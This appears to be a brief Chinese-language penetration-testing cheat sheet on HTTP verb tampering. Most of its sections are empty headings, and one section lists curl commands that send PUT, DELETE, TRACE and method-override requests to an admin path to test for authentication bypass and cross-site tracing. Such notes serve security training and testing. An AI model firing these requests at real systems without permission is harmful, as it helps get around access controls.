HTTP Verb Tampering
1. 發現點
2. 測試Payload
# 測試是否能繞過身份驗證
curl -X GET http://target.com/admin
curl -X PUT http://target.com/admin
curl -X DELETE http://target.com/admin
# 測試 HEAD 是否會洩露敏感資訊
curl -X HEAD http://target.com/admin -i
# 利用 TRACE 進行 XST(跨站追蹤攻擊)
curl -X TRACE http://target.com/admin -i
# 測試 X-HTTP-Method-Override
curl -X POST http://target.com/admin -H "X-HTTP-Method-Override: DELETE"3. bypass技巧
4. 濫用
🚀 進一步攻擊方向
5.Skills Assessment
最后更新于
这有帮助吗?